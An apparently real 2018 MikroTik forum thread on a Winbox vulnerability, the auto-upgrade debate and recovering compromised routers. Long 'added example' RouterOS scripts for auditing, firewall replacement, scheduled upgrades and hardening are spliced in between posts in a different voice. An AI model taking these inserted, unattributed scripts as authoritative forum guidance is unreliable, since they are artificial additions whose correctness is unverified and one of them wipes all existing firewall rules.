Try to buy a Tesl.... car or other smart car with this kind of critical vulnerability and have them to tell you that you need to update the software by yourself ( and its your problem if you didn't update it...)

Best Regards
R.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 12:27 pm
by normis
I disagree. It is the job of the administrator to configure the device securely, and then decide when to upgrade. MikroTik can't reboot mission critical devices without consent. We have no access to your devices.

The vulnerability doesn't affect anyone that has the default firewall, or has configured his own firewall correctly.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 12:32 pm
by sid5632

It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
Sorry to disagree but you're wrong. It is MIKROTIK's job to update our routers' software
No, it is you who is WRONG. Now why don't you toddle off to Microsoft and get a copy of Windows 10. Then you can have as many automated updates at inconvenient times as you like.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:02 pm
by spacemind

It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
Sorry to disagree but you're wrong. It is MIKROTIK's job to update our routers' software
No, it is you who is WRONG. Now why don't you toddle off to Microsoft and get a copy of Windows 10. Then you can have as many automated updates at inconvenient times as you like.
Oh... Am I wrong? ROS has bugs, but it's not Windows 10, it's much better, and don't forget that Mikrotik is sold all around the world to end customers.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:16 pm
by mrz
How happy would you be if the Tesla suddenly rebooted and tried to upgrade in the middle of a slippery mountain road with a lot of dangerous turns?

A router is supposed to work 24/7 and it is not possible to guess what would be a convenient time for each customer to upgrade and have network downtime.
That is why network administrators exist: to administer the network, upgrade routers or set up upgrade scripts scheduled for the most convenient time.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:22 pm
by spacemind
I disagree. It is the job of the administrator to configure the device securely, and then decide when to upgrade. MikroTik can't reboot mission critical devices without consent. We have no access to your devices.

The vulnerability doesn't affect anyone that has the default firewall, or has configured his own firewall correctly.
Normis,

Securely? I only have winbox access opened to WAN, and with a different port than the default one.

We can have an upgrade menu where we can choose if we want the critical, (extreme critical in this case) upgrades done in auto mode. That option can be disabled by default.

This would solve critical vulnerability issues: upgrade, reboot and notify the client. I know that some updates are buggy and we will have problems, but in my opinion I prefer to have an upgrade with some bugs, even if a hotspot/PPPoE server with 5000 clients stops working, rather than have the router hacked....

thanks.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:24 pm
by normis
Securely? I only have winbox access opened to WAN, and with a different port than the default one.
So it means you can keep using it without worry, and there is no urgent need for the manufacturer to force upgrade your device.
Also, how could we upgrade it if you have a firewall?

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:32 pm
by spacemind
How happy would you be if the Tesla suddenly rebooted and tried to upgrade in the middle of a slippery mountain road with a lot of dangerous turns?

A router is supposed to work 24/7 and it is not possible to guess what would be a convenient time for each customer to upgrade and have network downtime.
That is why network administrators exist: to administer the network, upgrade routers or set up upgrade scripts scheduled for the most convenient time.

A Tesla car should go to a safe place/shop in auto mode, stop, do the critical update, notify the client and contact Tesla support to check with the client, as we are talking about a 160.000€ car .... what do you think?

A simple menu where you can choose if you want to do the critical updates and reboot is enough for that. Network admins do whatever they think is better, but end customers should be protected; Mikrotik sells thousands of units to end customers, not only to companies.

Anyway, this conversation will not help in the future; a new feature suggestion will do the work.

thanks for your comments guys :)

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:38 pm
by spacemind
Securely? I only have winbox access opened to WAN, and with a different port than the default one.
So it means you can keep using it without worry, and there is no urgent need for the manufacturer to force upgrade your device.
Also, how could we upgrade it if you have a firewall?
That's why I have chosen Mikrotik since 2001: to use it without worries. I am not a sysadmin, I just show clients and friends the best affordable equipment on the market with the best software to manage it, and I'm happy to have Mikrotik.

Firewall rules can be changed if there is an upgrade menu :)

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 1:47 pm
by normis
You can already do it.

In system scheduler, add new entry that does this every 24 hours or whenever:
/system package update
check-for-updates once
:delay 1s;
:if ( [get status] = "New version is available") do={ install }
https://wiki.mikrotik.com/wiki/Manual:U ... to-upgrade

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 4:37 pm
by Cha0s
A Tesla car should go to a safe place/shop in auto mode, stop, do the critical update, notify the client and contact Tesla support to check with the client, as we are talking about a 160.000€ car .... what do you think?
I think that I wouldn't want my 160.000€ car to stop whenever it feels like it should update itself while I am in a rush to get my pregnant wife or my hurt child to the hospital.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 18, 2018 5:57 am
by OhJeez
Automatic upgrade should be the default and is quickly becoming best practice.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 18, 2018 9:25 am
by normis
See above configuration line. It can't be default, because I don't know at what time you don't need any internet.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 18, 2018 9:43 am
by eddieb
NEVER make updates automatic !
We want to control the moment of update and rebooting devices.
The way it is done now is sufficient; announcements through mailing and on this forum are fine.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 18, 2018 8:29 pm
by sid5632
Automatic upgrade should be the default
No, it should not.
and is quickly becoming best practice.
Only if you're using the Micro$oft definition of 'best', which really means worst.
Upgrading in a controlled manner is best practice, not when some bone-head elsewhere in the world dictates.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 19, 2018 9:52 am
by Karas
Automatic upgrade should be the default
No, it should not.
and is quickly becoming best practice.
Only if you're using the Micro$oft definition of 'best', which really means worst.
Upgrading in a controlled manner is best practice, not when some bone-head elsewhere in the world dictates.
I think it's unfair to call Mikrotik bone-heads in this case, as they are also saying no to the automatic upgrades. :lol:
Seriously though, I agree, it should be up to the network admin to decide when updates should take place, not rely on someone else to decide when the network will go offline.
Especially when some releases have come out buggy at times, which is why it's often better to wait a couple of days for forum/community feedback and/or test the release yourself before implementing.

@OhJeez - try controlling a network with hundreds of Mikrotik devices on it, and have someone else decide when upgrades should take place instead of you.
And then have the upgrade be to a buggy release.
Have fun,

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 19, 2018 10:27 am
by Cha0s
I think its unfair to call Mikrotik bone-heads in this case, as they are also saying no to the automatic upgrades. :lol:
I don't think he meant Mikrotik but the likes of Microsoft and their stupid forced updates.

Another example is Dropbox. It upgrades whenever it feels like it. No notification, no mention of it anywhere.
It's borderline backdoor/malware behavior.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 19, 2018 8:54 pm
by sid5632
I don't think he meant Mikrotik but the likes of Microsoft and their stupid forced updates.
It is indeed Micro$oft I meant.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 11:07 am
by mrz
Even your "beloved" Microsoft does not force reboots. You choose when to reboot the PC.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 11:16 am
by andriys
Even your "beloved" Microsoft does not force reboots.
In Windows 10 it does, actually.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 11:18 am
by mrz
No it does not, unless you scheduled automatic restarts.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 12:41 pm
by karlisi
In some cases Windows 10 forces the user to restart the computer, not letting them do anything else. It's almost the same, except if the user wants to sit and look at something like "You must restart Your computer to finish important update" forever.
It's off-topic, imho. Mikrotik should not change upgrade to automatic by default, period. But if the upgrade process would check firewall rules for unsafe entries on every upgrade, and warn the user afterwards (in the log, on the terminal, in a dialog box like after a config reset), it would be helpful for inexperienced users.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 12:58 pm
by andriys
No it does not, unless you scheduled automatic restarts.
It's getting a bit off-topic, but still. The default behavior of Windows 10 is to always install updates automatically as soon as they become available, and then force an automatic reboot at some point outside of a (somewhat) configurable "activity period". You can configure this activity period (with limitations), but that's it. Nothing else can be changed/configured unless you are using the Pro or Enterprise edition, and even then you need to know how to use the policy editor and which policy to tweak in order to prevent automatic updates from happening without user consent.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 1:40 pm
by mrz
would check firewall rules for unsafe entries on every upgrade
What is considered an unsafe entry? And how would you determine that a particular entry is unsafe in a specific firewall?

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 2:34 pm
by karlisi
would check firewall rules for unsafe entries on every upgrade
What is considered an unsafe entry? And how would you determine that a particular entry is unsafe in a specific firewall?
Everything outside default protection rules. It should be only warning, nothing else.
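The warning-only check karlisi proposes, written out as an added example in RouterOS scripting. This is my constructed script, not MikroTik's code and not part of any upgrade process; it assumes only the built-in /ip socks, /ip service, /ip firewall filter, /system script and /system scheduler paths, and that a service with no address restriction reports an empty address value. It logs what it finds and changes nothing, so the administrator decides what is "unsafe" for their own firewall:

```routeros
# Added example: warning-only configuration audit. Run it from a terminal
# or a scheduler entry. It never changes anything; it only writes to the log.
:local warnings 0

# 1. SOCKS proxy: the advisory that opens this thread says to delete any
#    SOCKS configuration left behind by the attacker, so flag it if enabled.
:if ([/ip socks get enabled] = true) do={
    :log warning "audit: SOCKS proxy is enabled"
    :set warnings ($warnings + 1)
}

# 2. Management services reachable from any address (no 'address' restriction).
#    Assumption: an unrestricted service returns an empty address value.
:foreach svc in=[/ip service find disabled=no] do={
    :local svcName [/ip service get $svc name]
    :if ([:len [/ip service get $svc address]] = 0) do={
        :log warning ("audit: service " . $svcName . " accepts connections from any address")
        :set warnings ($warnings + 1)
    }
}

# 3. Input chain with no drop rule at all. The default firewall ends the input
#    chain with "drop all not coming from LAN"; a chain that drops nothing is
#    the situation this thread keeps warning about.
:if ([:len [/ip firewall filter find chain=input action=drop]] = 0) do={
    :log warning "audit: input chain contains no drop rule"
    :set warnings ($warnings + 1)
}

# 4. Scripts and scheduler entries: list them so an unknown one stands out
#    (the thread's advice is to delete any script you did not create).
:foreach s in=[/system script find] do={
    :log info ("audit: script present: " . [/system script get $s name])
}
:foreach s in=[/system scheduler find] do={
    :log info ("audit: scheduler entry present: " . [/system scheduler get $s name])
}

:put ("audit finished with " . $warnings . " warning(s); see /log print")
```

Save it under /system script, run it with /system script run, and read the result with /log print. Because it only reads the configuration and writes log entries, it is the kind of check mkx describes: noise only for those who actually look at their router.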

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 2:46 pm
by Cha0s
Everything outside default protection rules. It should be only warning, nothing else.
So, everyone else that does not use the default firewall will get annoying warnings about a supposedly insecure firewall configuration?

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 3:14 pm
by mkx
Everything outside default protection rules. It should be only warning, nothing else.
So, everyone else that does not use the default firewall will get annoying warnings about a supposedly insecure firewall configuration?
No, not everybody. Only those who care enough to check their router from time to time. Those that don't even care to upgrade ancient unsafe ROS versions won't be bothered by it.

I find red-coloured log entry about CPU not running at default frequency (even if downclocked so it should be harmless to hardware) annoying as well, but I have to live with it.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 3:23 pm
by Cha0s
So we, professional users of ROS who use it every day, should have to get stupid warnings because of dummy users that mess up their firewall and never even bother to log in to their routers ever again.

Who exactly will this message be for then?

Please. Stop trying to convert RouterOS to a 'DummyOS'. If you need wizards, bells and whistles to the likes of Netgear and D-Link, then by all means. Get a D-Link.

RouterOS is a system for power users and professionals. Not for dummy users.

Do you expect Cisco to put in warnings and auto-update features? You know that when you pay thousands of dollars for a Cisco, you have to know what you are doing to use it. You don't expect Cisco to babysit you in case you mess up your configuration.

Why should RouterOS be any different? Because it's cheap?

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 20, 2018 3:27 pm
by mkx
So we, professional users of ROS, ...
See how your own position is skewing your point of view? :wink:

Seriously: even being myself a "home user" by all standards I'm with you on this.

Re: Winbox vulnerability: please upgrade

Posted: Sun Sep 30, 2018 9:09 am
by WestTexas
I have several clients that still have 6.38.5 and were compromised this weekend.
A new firmware file has been uploaded, but it is ignored when it reboots. It remains in the file list and the log just shows 'router rebooted'.
I have tried several firmware versions including 6.42.3.
I have also reset the configuration then tried new firmware. It still fails to take the new firmware.

Any suggestions?

Re: Winbox vulnerability: please upgrade

Posted: Sun Sep 30, 2018 10:24 am
by mkx
Verify that the uploaded npk file is intended for the correct platform.

Check the list of installed packages. If there's a package listed more than once, the upgrade won't succeed and the only remedy is to perform netinstall.

Re: Winbox vulnerability: please upgrade

Posted: Sun Sep 30, 2018 5:43 pm
by WestTexas
Thanks mkx
It's the right version, and has been placed on several unaffected routers and installed normally.
No errors, just shows 'router rebooted' in the log and the file remains.

Re: Winbox vulnerability: please upgrade

Posted: Sun Sep 30, 2018 6:07 pm
by mkx
There are two wireless packages installed. Try to uninstall wireless-cm2 (this might not be possible if it's part of a bundle).
Other than that, I'd try to upgrade first to 6.40.9 (you might be able to perform that without downloading the package; change the package channel to bugfix only) ... that's the last version with the old "master port" configuration. Then upgrade to 6.42.x to have the upgrade process translate "master port" to the new bridge. After that upgrade to 6.43.2. And don't forget to upgrade firmware at every step (/system routerboard upgrade).

Re: Winbox vulnerability: please upgrade

Posted: Sun Sep 30, 2018 8:30 pm
by spacemind
I have several clients that still have 6.38.5 and were compromised this weekend.
A new firmware file has been uploaded, but it is ignored when it reboots. It remains in the file list and the log just shows 'router rebooted'.
I have tried several firmware versions including 6.42.3.
I have also reset the configuration then tried new firmware. It still fails to take the new firmware.

Any suggestions?
Hi,

I have faced the same issue; the solution is:

Netinstall all affected devices with 6.43.2 with no default configuration and configure everything from scratch...

After I discovered a few affected routers, I first turned off all remote access, winbox, telnet... uploaded the 6.42.3 file and rebooted, but no upgrade was done, so my solution is the one above, and I got everything working except a few boards where the LTE card stopped working even after upgrade and reboot. (Had to buy new LTE routers to replace those miniPCIe cards.)


Best regards

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 01, 2018 11:36 am
by Deantwo
WestTexas:
In theory, if you can't upgrade the routers at all, just make sure they can't be accessed from untrusted networks. The vulnerability is only an issue if it can be accessed in the first place.
For example, make them only accept WinBox connections from your specific public IP range. Or give all routers an SSTP tunnel for maintenance access.

It is still recommended to upgrade to the newer RouterOS version, but you can at least eliminate the threat of this vulnerability by just improving your firewall to prevent access from untrusted networks.

PS: Be sure to scrub the routers for any mischievous configuration or scripts.

Re: Winbox vulnerability: please upgrade

Posted: Tue Oct 09, 2018 8:55 am
by ssbaksa
Automatic upgrade should be the default and is quickly becoming best practice.
This is plain stupid!
I could be fired on the spot if I don't issue a warning about downtime. Some environments depend on equipment which is 24/7/365 up.
Not everyone has Mikrotik in a home or small office environment.
If you like automation there is what Normis proposed as a script for doing it.

Happy networking,

Re: Winbox vulnerability: please upgrade

Posted: Tue Oct 09, 2018 11:20 am
by pe1chl
Maybe MikroTik or one of the expert scripting users could post a script that changes the firewall filter rules of a router to the new default firewall.
The script that adds that is of course already available in the router but it does a lot of other things.
Some users might not be prepared to reset their entire config but their firewall is not so complicated and it could easily be replaced with the new one.
(especially as there are now some rules that make it unnecessary to add specific rules to the filter after having configured dst-nat and IPsec)

The script would create the new WAN and LAN interface lists, populate them, remove all current firewall filter rules and install the default rules.
The user would then have to customize it in special cases, but for the average "NAT router with some forwardings and VPNs" it would just work.
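What pe1chl's replacement script could look like, as an added example of my own (not MikroTik's defconf script and not something posted in this thread), with Deantwo's "WinBox only from your own public range" rule folded in. Assumptions: ether1 is the WAN port, an interface named bridge carries the LAN, and 203.0.113.0/24 is a placeholder for the administrator's trusted range. It removes every existing filter rule before installing the default set, so run it from a console or LAN-side session after exporting the current configuration:

```routeros
# Added example (not MikroTik's own defconf script): rebuild the firewall
# filter as a new-style default while leaving the rest of the config alone.
# ASSUMPTIONS: ether1 = WAN port, bridge = LAN bridge,
# 203.0.113.0/24 = placeholder for the administrator's trusted address range.

# Interface lists the new rules refer to; create them only if missing.
:if ([:len [/interface list find name=WAN]] = 0) do={ /interface list add name=WAN }
:if ([:len [/interface list find name=LAN]] = 0) do={ /interface list add name=LAN }
/interface list member add list=WAN interface=ether1
/interface list member add list=LAN interface=bridge

# Trusted management sources (placeholder range; replace with your own).
/ip firewall address-list add list=mgmt-allowed address=203.0.113.0/24 comment="placeholder admin range"

# Remove the old filter rules and install the default-style set.
/ip firewall filter remove [find]

# --- input chain: traffic to the router itself ---
/ip firewall filter add chain=input action=accept connection-state=established,related comment="accept established,related"
/ip firewall filter add chain=input action=drop connection-state=invalid comment="drop invalid"
/ip firewall filter add chain=input action=accept protocol=icmp comment="accept ICMP"
/ip firewall filter add chain=input action=accept protocol=tcp dst-port=8291 in-interface-list=WAN src-address-list=mgmt-allowed comment="winbox only from trusted admin range"
/ip firewall filter add chain=input action=drop in-interface-list=!LAN comment="drop all not coming from LAN"

# --- forward chain: traffic through the router ---
# IPsec policy matches admit tunnel traffic without per-service rules.
/ip firewall filter add chain=forward action=accept ipsec-policy=in,ipsec comment="accept in ipsec policy"
/ip firewall filter add chain=forward action=accept ipsec-policy=out,ipsec comment="accept out ipsec policy"
/ip firewall filter add chain=forward action=fasttrack-connection connection-state=established,related comment="fasttrack"
/ip firewall filter add chain=forward action=accept connection-state=established,related comment="accept established,related"
/ip firewall filter add chain=forward action=drop connection-state=invalid comment="drop invalid"
# Anything new from the WAN that was not dst-nat'ed is dropped, so port
# forwardings work from /ip firewall nat alone.
/ip firewall filter add chain=forward action=drop connection-state=new connection-nat-state=!dstnat in-interface-list=WAN comment="drop all from WAN not DSTNATed"
```

The IPsec and "not DSTNATed" forward rules are the ones pe1chl refers to: a dst-nat entry or an IPsec policy is enough to admit that traffic, with no extra filter rule per service. Everything else from the WAN to the router is dropped by the last input rule, which is the rule pe1chl later asks people not to remove.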

Re: Winbox vulnerability: please upgrade

Posted: Tue Oct 09, 2018 11:30 am
by pe1chl
Automatic upgrade should be the default and is quickly becoming best practice.
This is plain stupid!
I could be fired on the spot if I don't issue a warning about downtime. Some environments depend on equipment which is 24/7/365 up.
But then you don't understand what "default" means?
Default does not mean it is happening all the time. It is a setting that is automatically made and is useful for many, but can be changed by individual users with different requirements.

I am all for a default automatic upgrade, but it should use a separate release channel so that routers are not blindly following the stable or even long-term channels. We all know that every 6.xx version is immediately followed up with 6.xx.1 and 6.xx.2 to fix major mishaps, and automatic upgrade should not suffer from that, or users will disable it just to have fewer issues.
Automatic upgrade should install a version that is known to be reliable (has been online for at least a month without showstopping issues, with the exception of one well-tested and localized fix for a vulnerability) and its version should only change when major problems have been found, like recently.

It prevents the current situation where there will be 100.000 vulnerable routers on the internet for at least a decade, and we will read those alarming security notices from yet another group who have found yet another exploit every month.

You with your 24/7/365 uptime are of course watching the security situation and act accordingly. But the average user isn't, and default automatic upgrade is a good solution for that.

Re: Winbox vulnerability: please upgrade

Posted: Tue Oct 09, 2018 11:33 am
by normis
pe1chl, do you think this script in a scheduler rule would be a good idea? The scheduler time could be determined by the user (or disabled):
/system package update
check-for-updates once
:delay 1s;
:if ( [get status] = "New version is available") do={ install }
we could add this into our iOS/Android application wizard mode.
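normis's scheduler script written out as an added example (my own, not the MikroTik wiki script and not a feature of the app wizard), extended with logging, pinned to a conservative channel along the lines pe1chl asks for, and including the RouterBOARD firmware step mkx reminds readers not to skip. Assumptions: the conservative channel is called bugfix, as in the RouterOS 6.4x releases this thread is about, and a reboot in the scheduled window is acceptable:

```routeros
# Added example: scheduled upgrade with logging and the firmware step.
# ASSUMPTIONS: channel name "bugfix" (conservative channel in RouterOS 6.4x);
# the scheduled window is one in which a reboot is acceptable.

# Follow the conservative channel so the router never jumps to a release on
# the day it appears (pe1chl's concern). Setting it every run is harmless.
/system package update set channel=bugfix

# Step 1: if a firmware upgrade is still pending from the previous package
# install, apply it first. Package install and firmware upgrade are two
# separate reboots, so they are done on two separate runs.
:if ([/system routerboard get current-firmware] != [/system routerboard get upgrade-firmware]) do={
    :log warning "auto-upgrade: upgrading RouterBOARD firmware, rebooting"
    /system routerboard upgrade
    :delay 5s
    /system reboot
}

# Step 2: otherwise check the selected channel and install if a newer
# version is offered. Give the check a few seconds to finish before reading.
/system package update
check-for-updates once
:delay 3s
:local st [get status]
:log info ("auto-upgrade: " . $st)
:if ($st = "New version is available") do={
    :log warning ("auto-upgrade: installing " . [get latest-version] . ", rebooting")
    install
}
```

Save it as a script named auto-upgrade with a policy that includes reboot, then create the scheduler entry the post describes, for example /system scheduler add name=auto-upgrade start-time=03:00:00 interval=1d on-event=auto-upgrade policy=read,write,reboot,policy,test. The log lines give the administrator a record of every check and every reboot, which is what eddieb and Karas want to keep control of.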

Re: Winbox vulnerability: please upgrade

Posted: Tue Oct 09, 2018 11:52 am
by normis
Maybe MikroTik or one of the expert scripting users could post a script that changes the firewall filter rules of a router to the new default firewall.
The script that adds that is of course already available in the router but it does a lot of other things.
Some users might not be prepared to reset their entire config but their firewall is not so complicated and it could easily be replaced with the new one.
(especially as there are now some rules that make it unnecessary to add specific rules to the filter after having configured dst-nat and IPsec)

The script would create the new WAN and LAN interface lists, populate them, remove all current firewall filter rules and install the default rules.
The user would then have to customize it in special cases, but for the average "NAT router with some forwardings and VPNs" it would just work.
I think this already exists:

1. upgrade to latest
2. system reset

This will load the new default config and the user will just need to re-create his PPPoE client

Re: Winbox vulnerability: please upgrade

Posted: Tue Oct 09, 2018 12:32 pm
by pe1chl
Normis:
1. about auto upgrade: yes, but it should be installed by default in new routers and it should use a dedicated release channel only for security fixes like those that fixed the winbox and webserver vulnerabilities.
2. about firewall: what I suggest fixes only the firewall filters without overwriting all other configuration, which may be easier to convince the users to do.

Re: Winbox vulnerability: please upgrade

Posted: Wed Oct 10, 2018 6:28 pm
by briefwum
Thanks for the link.

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 4:47 pm
by usmany
Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.
Normis and others in the forum, I upgraded my RouterOS from v6.41 to v6.43.2 and winbox to v3.18. I have been hacked by an attacker.

What is your take here!

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 4:51 pm
by BartoszP
Have you netinstalled?

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 4:58 pm
by usmany
Have you netinstalled?
Yes, I netinstalled on Friday. Today, Monday, I connected remotely to the office twice; after those 2 connections I can no longer connect. It tells me wrong username/password. I am sure the attacker sniffed the login details again to lock me out again.

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 5:25 pm
by pe1chl
Have you netinstalled?
Yes, I netinstalled on Friday. Today, Monday, I connected remotely to the office twice; after those 2 connections I can no longer connect. It tells me wrong username/password. I am sure the attacker sniffed the login details again to lock me out again.
You should not allow remote connection to the router admin interface from the entire internet. That is just asking for trouble. The default firewall does not allow that, please do not remove that rule.

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 5:52 pm
by Karas
Have you netinstalled?
Yes, I netinstalled on Friday. Today, Monday, I connected remotely to the office twice; after those 2 connections I can no longer connect. It tells me wrong username/password. I am sure the attacker sniffed the login details again to lock me out again.
Just to confirm the (hopefully) obvious, you did use a different password afterwards, right?
And as pe1chl said, did you block the remote access?

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 11:21 pm
by spacemind
Normis:
1. about auto upgrade: yes, but it should be installed by default in new routers and it should use a dedicated release channel only for security fixes like those that fixed the winbox and webserver vulnerabilities.
2. about firewall: what I suggest fixes only the firewall filters without overwriting all other configuration, which may be easier to convince the users to do.
+1 for dedicated release channel for security fixes and auto upgrade option menu to enable/disable.

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 15, 2018 11:28 pm
by spacemind
Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.
Normis and others in the forum, I upgraded my RouterOS from v6.41 to v6.43.2 and winbox to v3.18. I have been hacked by an attacker.

What is your take here!

Finally someone had same problems like me lol...

The only way that i had to solve this was:

1- Netinstall
2- Remove default configuration
3- Manually configure everything and voilà!
4- disable ip/services that you will not be using (ftp, telnet....)
(DO NOT USE SAME USERNAME/PASSWORD FOR WINBOX)

Already done it on 150+ devices ...
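spacemind's step 4 spelled out, as an added example of my own (not a configuration posted in this thread): the weak state a fresh or old install is often left in, beside a hardened one. Assumptions: 192.168.88.0/24 is the LAN, 203.0.113.0/24 is a placeholder for the administrator's own public range, new-admin-name and the passphrase are placeholders, and an interface list named LAN exists (the default configuration creates one):

```routeros
# Added example: management-plane hardening after a clean netinstall.
# ASSUMPTIONS: LAN = 192.168.88.0/24, trusted admin range = 203.0.113.0/24
# (placeholder), interface list LAN exists, placeholders for user/passphrase.

# --- weak state, for comparison ---
#   /ip service print shows telnet, ftp, www, ssh, winbox, api, api-ssl all
#   enabled with no 'address' restriction, and the default 'admin' user with
#   a known password. That is the state the attacker in this thread walked into.

# --- hardened state ---
# Disable clear-text and unused management services outright.
/ip service disable telnet
/ip service disable ftp
/ip service disable www
/ip service disable api
/ip service disable api-ssl

# Keep ssh and winbox, but answer only the LAN and the trusted admin range.
/ip service set ssh address=192.168.88.0/24,203.0.113.0/24
/ip service set winbox address=192.168.88.0/24,203.0.113.0/24

# Layer-2 management (MAC-telnet, MAC-winbox) answers on every interface by
# default; confine it to the LAN list so the WAN port never speaks it.
/tool mac-server set allowed-interface-list=LAN
/tool mac-server mac-winbox set allowed-interface-list=LAN

# Neighbour discovery likewise: do not advertise the router towards the WAN.
/ip neighbor discovery-settings set discover-interface-list=LAN

# The SOCKS proxy is what the thread's advisory says the attacker enabled;
# make sure it is off.
/ip socks set enabled=no

# A new administrator under a new name, then disable the default account
# (the "do not reuse the same username/password" point above).
/user add name=new-admin-name group=full password="<strong passphrase>"
/user disable admin
```

Do the /user steps last and from a session you know is the new account, or you can lock yourself out the way several posters above did. The address restriction on /ip service is a second line behind the firewall's input chain, so a later firewall mistake does not by itself reopen WinBox to the whole internet.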

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 22, 2018 12:26 pm
by Kraken2k
Automatic upgrade should be the default and is quickly becoming best practice.
This is plain stupid!
I could be fired on the spot if I don't issue a warning about downtime. Some environments depend on equipment which is 24/7/365 up.
Not everyone has Mikrotik in a home or small office environment.
If you like automation there is what Normis proposed as a script for doing it.

Happy networking,
I think that automatic upgrade could be in the "default configuration" - if you do anything beyond an average home configuration (like the example you described), the first step with a new device is "remove default configuration" and then configure the device from the very beginning, tailored to your needs.

Home users, who do not care much and leave the default config on (or those who do not understand/do not care), will get automatic updates and won't stay behind with old vulnerable versions. And these usually don't run the critical applications that do not survive a two or three minute outage during the night hours.

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 22, 2018 3:06 pm
by ssbaksa
Automatic upgrade should be the default and is quickly becoming best practice.
This is plain stupid!
I could be fired on the spot if I don't issue a warning about downtime. Some environments depend on equipment which is 24/7/365 up.
Not everyone has Mikrotik in a home or small office environment.
If you like automation there is what Normis proposed as a script for doing it.

Happy networking,
I think that automatic upgrade could be in the "default configuration" - if you do anything beyond an average home configuration (like the example you described), the first step with a new device is "remove default configuration" and then configure the device from the very beginning, tailored to your needs.

Home users, who do not care much and leave the default config on (or those who do not understand/do not care), will get automatic updates and won't stay behind with old vulnerable versions. And these usually don't run the critical applications that do not survive a two or three minute outage during the night hours.
No, if that ever sees daylight then it should be an "opt in" option with a warning sign on the first connect screen; otherwise it should be as it is now.
That's my opinion based on 30 years of experience as a system engineer/admin. I don't say it lightly.

Here, in the country I am from, all home-based router CPEs belong to providers and are directly managed by them. If you use MT, it will in most cases be behind their router with port forwarding enabled.

Br,
Sasa

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 22, 2018 3:51 pm
by pe1chl
No, if that ever sees daylight then it should be an "opt in" option with a warning sign on the first connect screen; otherwise it should be as it is now.
That's my opinion based on 30 years of experience as a system engineer/admin. I don't say it lightly.
No, for it to be useful it HAS TO BE enabled by default!
Note that it is not targeted to system engineers/admins.
They can turn off such an option when they (think that they) know better.
But for the average home user a router is a buy-install-and-forget device and it has to be auto-updating or else it won't be updated ever.
Note that I do not advocate a situation where each router is following the release of every new version.
This auto-update should use a dedicated release channel that is only used to distribute critical fixes or well-tested new versions.
(the latter only to avoid situations where auto-updating systems are forced to make a big version jump in case a critical fix is made)

Re: Winbox vulnerability: please upgrade

Posted: Sat Oct 27, 2018 6:21 pm
by handlefman
Hello Mikrotik Community
I updated the router when I saw the news, but did not update the password. Now I can't hack my router to get access to it, what are the ideas?

current firmware version on hacked router 6.42.7

Can someone tell me the IP white address, which is registered on the hacked address for access to the router? (so that I could recreate the test environment for access)


please help me.

Re: Winbox vulnerability: please upgrade

Posted: Sat Oct 27, 2018 6:50 pm
by pe1chl
Just use netinstall to re-install and reset it and use your export or backup (from before it was hacked!) to reconfigure it.
Alternatively just reconfigure it manually.

Re: Winbox vulnerability: please upgrade

Posted: Mon Oct 29, 2018 11:14 am
by Kraken2k
Automatic upgrade should be the default and is quickly becoming best practice.
This is plain stupid!
I could be fired on the spot if I don't issue a warning about downtime. Some environments depend on equipment which is 24/7/365 up.
Not everyone has Mikrotik in a home or small office environment.
If you like automation there is what Normis proposed as a script for doing it.

Happy networking,
I think that automatic upgrade could be in the "default configuration" - if you do anything beyond an average home configuration (like the example you described), the first step with a new device is "remove default configuration" and then configure the device from the very beginning, tailored to your needs.

Home users, who do not care much and leave the default config on (or those who do not understand/do not care), will get automatic updates and won't stay behind with old vulnerable versions. And these usually don't run the critical applications that do not survive a two or three minute outage during the night hours.
No, if that ever sees daylight then it should be an "opt in" option with a warning sign on the first connect screen; otherwise it should be as it is now.
